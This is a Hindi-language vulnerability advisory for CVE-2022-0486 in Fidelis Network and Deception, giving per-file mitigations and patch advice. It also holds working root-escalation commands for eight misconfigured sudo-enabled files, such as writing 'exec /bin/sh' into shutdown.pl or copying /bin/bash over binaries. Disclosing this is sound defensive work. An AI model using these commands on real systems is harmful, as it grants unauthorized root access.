
Fidelis Network and Deception - असुरक्षित फ़ाइल अनुमतियाँ विशेषाधिकार वृद्धि - एकाधिक
सभी एक्सप्लॉइट्स को अमेरिकी सरकार द्वारा सार्वजनिक रिलीज़ के लिए अनुमोदित किया गया था। अनंत वितरण के लिए दस्तावेज़ीकरण को मंजूरी देने वाले सेवाकर्मियों और सरकारी संपर्कों का विशेष धन्यवाद। कृपया निम्नलिखित OTR नंबर देखें:
दिनांक: 20220517 2005H UTC
एक्सप्लॉइट लेखक: Henry Reed, The Aerospace Corporation
विक्रेता होमपेज: https://fidelissecurity.com/
प्रभावित संस्करण:
परीक्षण किया गया:
CVE: CVE-2022-0486
CVE विवरण: Fidelis Network और Deception के CommandPost, Collector, Sensor, और Sandbox घटकों में अनुचित फ़ाइल अनुमतियाँ एक आक्रमणकारी को CLI तक स्थानीय, प्रशासनिक पहुँच रखने वाले को प्रभावित फ़ाइलों को संशोधित करने और रूट उपयोगकर्ता के समकक्ष विशेषाधिकारों को सक्षम करने की अनुमति देती हैं। यह भेद्यता Fidelis Network और Deception संस्करण 9.4.5 से पहले के संस्करणों में मौजूद है। इस भेद्यता को दूर करने के लिए पैच और अपडेट उपलब्ध हैं।
इस CVE के अंतर्गत कई एक्सप्लॉइट मौजूद हैं, क्योंकि CVE अनुचित फ़ाइल अनुमतियों की एक श्रृंखला को कवर करता है। सभी एक्सप्लॉइट fidelis उपयोगकर्ता को उन बाइनरी या स्क्रिप्ट्स पर एक NOPASSWD और कई पासवर्ड-आवश्यक sudoers अनुमतियाँ दिए जाने के कारण हैं, जिनका स्वामी fidelis उपयोगकर्ता स्वयं है, इसलिए fidelis उपयोगकर्ता को फ़ाइल को मनमाने ढंग से संशोधित करने की अनुमति मिलती है। यह स्थानीय विशेषाधिकार उन्नयन की अनुमति देता है।
NOPASSWD के साथ प्रभावित फ़ाइल:
पासवर्ड की आवश्यकता वाली प्रभावित फ़ाइलें:
प्रभावित Fidelis Deception या Fidelis Network उपयोगकर्ताओं को इस भेद्यता को पैच करने के लिए अपने सॉफ़्टवेयर को अपडेट करने की अनुशंसा की जाती है। सभी उपयोगकर्ताओं के लिए, चाहे वे इस भेद्यता से प्रभावित हुए हों या नहीं, प्रारंभिक कॉन्फ़िगरेशन के बाद अपने Fidelis उत्पादों तक शेल पहुँच को अक्षम करने की भी अनुशंसा की जाती है।
यदि, किसी कारण से, इनमें से कोई भी संभव नहीं है, तो इस दस्तावेज़ में प्रत्येक कमजोर फ़ाइल के लिए एक शमन वर्णित है। लेखक के परीक्षण की सीमा तक, ऐसा प्रतीत होता है कि वर्णित शमनों को लागू करने से पहले उपयोगकर्ताओं को विशेषाधिकार बढ़ाने के लिए इनमें से किसी एक भेद्यता का उपयोग करना होगा, इसलिए Fidelis को अपडेट करना और SSH को अक्षम करना दृढ़ता से अनुशंसित है।
परीक्षण किया गया:
/FSS/bin/shutdown.pl पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड के लिए संकेत दिए बिना रूट उपयोगकर्ता के रूप में /FSS/bin/shutdown.pl निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को स्क्रिप्ट को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।
$ chmod 700 /FSS/bin/shutdown.pl
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
$ sudo /FSS/bin/shutdown.pl
भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट। NOPASSWD लाइन पर ध्यान दें, जो इंगित करती है कि shutdown.pl विशेषाधिकार उन्नयन के लिए एक संभावित उम्मीदवार है:

/FSS/bin/shutdown.pl के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/bin/shutdown.pl के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

परीक्षण किया गया:
/FSS/setup/cert_mgmt पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/setup/cert_mgmt निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को स्क्रिप्ट को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।
$ chmod u+w /FSS/setup/cert_mgmt
$ cp /bin/bash /FSS/setup/cert_mgmt
$ sudo /FSS/setup/cert_mgmt
भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

/FSS/setup/cert_mgmt के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/setup/cert_mgmt के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

परीक्षण किया गया:
/FSS/bin/db_updater पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को Fidelis CommandPost में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/bin/db_updater निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को बाइनरी को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।
$ chmod u+w /FSS/bin/db_updater
$ cp /bin/bash /FSS/bin/db_updater
$ sudo /FSS/bin/db_updater

/FSS/bin/db_updater के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/bin/db_updater के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

परीक्षण किया गया:
/FSS/deception-manager/bin/deception-manager पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को Fidelis CommandPost में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/deception-manager/bin/deception-manager निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को बाइनरी को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।
$ cp /bin/bash /FSS/deception-manager/bin/deception-manager
$ sudo /FSS/deception-manager/bin/deception-manager
भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

/FSS/deception-manager/bin/deception-manager के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/deception-manager/bin/deception-manager के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

परीक्षण किया गया:
/FSS/sbin/fssdbg.sh पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/sbin/fssdbg.sh निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को स्क्रिप्ट को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।
$ chmod u+w /FSS/sbin/fssdbg.sh
$ cp /bin/bash /FSS/sbin/fssdbg.sh
$ sudo /FSS/sbin/fssdbg.sh
भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

/FSS/sbin/fssdbg.sh के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/sbin/fssdbg.sh के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

परीक्षण किया गया:
/FSS/bin/mst पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/bin/mst निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को बाइनरी को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।
$ chmod u+w /FSS/bin/mst
$ cp /bin/bash /FSS/bin/mst
$ sudo /FSS/bin/mst
भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

/FSS/bin/mst के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/bin/mst के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा। निम्नलिखित विशेषाधिकार उन्नयन शमन और sudo के बिना fidelis द्वारा चलाए जाने पर mst कमांड आउटपुट का एक अंश दर्शाने वाला स्क्रीनशॉट है:

स्क्रीनशॉट दिखाता है कि शमन के साथ भी, कमांड को fidelis उपयोगकर्ता द्वारा sudo के रूप में चलाया जा सकता है:

स्क्रीनशॉट दिखाता है कि शमन का उपयोग करने पर mst को अन्य मनमाना कोड चलाने के लिए संशोधित नहीं किया जा सकता है:

परीक्षण किया गया:
/FSS/bin/setup पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/bin/setup निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को बाइनरी को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।
$ chmod u+w /FSS/bin/setup
$ cp /bin/bash /FSS/bin/setup
$ sudo /FSS/bin/setup
भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

/FSS/bin/setup के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/bin/setup के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:

परीक्षण किया गया:
/FSS/setup/unlock_cp_user.sh पर गलत तरीके से कॉन्फ़िगर किए गए स्वामित्व अनुमतियाँ fidelis उपयोगकर्ता को कई Fidelis उत्पादों में रूट उपयोगकर्ता के समकक्ष विशेषाधिकार बढ़ाने की अनुमति देती हैं। डिफ़ॉल्ट रूप से, sudoers कॉन्फ़िगरेशन fidelis उपयोगकर्ता को पासवर्ड प्रदान किए जाने पर रूट उपयोगकर्ता के रूप में /FSS/setup/unlock_cp_user.sh निष्पादित करने की अनुमति देता है। फ़ाइल fidelis उपयोगकर्ता के स्वामित्व में है, जो fidelis उपयोगकर्ता को स्क्रिप्ट को मनमाने ढंग से संशोधित करने और विशेषाधिकार बढ़ाने की अनुमति देती है।
$ chmod u+w /FSS/setup/unlock_cp_user.sh
$ cp /bin/bash /FSS/setup/unlock_cp_user.sh
$ sudo /FSS/setup/unlock_cp_user.sh
भेद्यता खोज और शोषण को दर्शाने वाला स्क्रीनशॉट:

/FSS/setup/unlock_cp_user.sh के उपयोगकर्ता और समूह स्वामियों को root:fidelis में बदलना और केवल /FSS/setup/unlock_cp_user.sh के समूह स्वामी को पढ़ने और निष्पादित करने की अनुमति देना इस भेद्यता को कम करेगा:
